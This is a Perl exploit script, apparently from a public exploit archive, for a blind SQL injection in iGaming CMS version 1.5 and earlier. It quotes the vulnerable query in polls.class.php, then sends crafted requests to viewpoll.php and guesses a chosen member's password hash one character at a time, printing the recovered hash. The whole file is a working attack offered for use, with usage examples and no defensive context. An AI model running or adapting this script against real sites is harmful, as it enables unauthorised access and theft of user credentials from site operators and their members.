#!/usr/bin/env perl
 
=pod
iGaming CMS <= 1.5 Blind SQL Injection
 
Author: plucky
Email: io.plucky@gmail.com
Web Site: http://plucky.heliohost.org
Crew : WarWolfZ
 
Usage:   perl exploit.pl <website> <user_id>
Example: perl exploit.pl http://website.net/iGamingCMS1.5/ 1
 
Vulnerability: polls.class.php
[line 10-17]
 
if (!empty($_REQUEST['id']))
{
  $poll = $db->Execute("
                        SELECT id,title
                        FROM `sp_polls`
                        WHERE `id` = '" . $_REQUEST['id'] . "'");
 
$result = $db->Execute("SELECT * FROM sp_polls_options WHERE poll_id = '$_REQUEST[id]' ORDER BY id");
 
THX TO: shrod and warwolfz crew
=cut
 
use strict;
use warnings;
use LWP::Simple;
 
my $password               = '';
my $vulnerable_page        = '';
 
my $target_id              =  1;
 
sub header_exploit {
    
   print 'iGaming CMS <= 1.5 Blind SQL Injection'    . "\n".
         '-----------------------------------------' . "\n".
         'Author:  plucky'                           . "\n".
         'Email:   io.plucky@gmail.com'              . "\n".
         '-----------------------------------------' . "\n".
         '[!]Target id: '.$target_id                 . "\n".
         '[!]Exploit Status: Working...'             . "\n";
}
 
sub usage_exploit {
 
   print 'Usage:'                                                    . "\n".
         '      perl exploit.pl http://[site]/[path]/ [id]'          . "\n".
         'Examples:'                                                 . "\n".
         '         perl' . $0 . 'http://web_site/cms/ 1'             . "\n".
         '         perl' . $0 . 'http://games_site/iGamingCMS1.5/ 1' . "\n";
 
exit;
}
 
sub run_exploit {
    
   my $parameter_id           = shift;
   my $parameter_page         = shift;
 
   my $target_id              = $$parameter_id;
   my $vulnerable_page        = $$parameter_page;
 
   my $character_id           =  1;
 
   my $HTML_source            = '';
   my $SQL_Injection          = '';
   my $hexadecimal_character  = '';
   my $result                 = '';
   my $table                  = 'sp_members';
 
   my @hexadecimal_characters = ( 48..57, 97..102 );
 
 
   foreach $character_id ( 1..32 ) {
        
   character_research:
          foreach $hexadecimal_character ( @hexadecimal_characters ) {
 
                 $SQL_Injection  = "viewpoll.php?id=' or ascii(substring((select pass from $table where id=$target_id),$character_id,1))=$hexadecimal_character\%23";
                 $HTML_source = get( $vulnerable_page.$SQL_Injection );
 
                 if ( $HTML_source !~ /Error/i ) {
 
                   $result .= chr($hexadecimal_character);
                   $character_id++;
 
                   last character_research;
       }
     }
   }
    
   return $result;
}
 
$vulnerable_page = $ARGV[0] || usage_exploit;
$target_id       = $ARGV[1] || usage_exploit;
 
header_exploit;
$password = run_exploit ( \$target_id, \$vulnerable_page );
 
print '[!]Password: ', $password, "\n";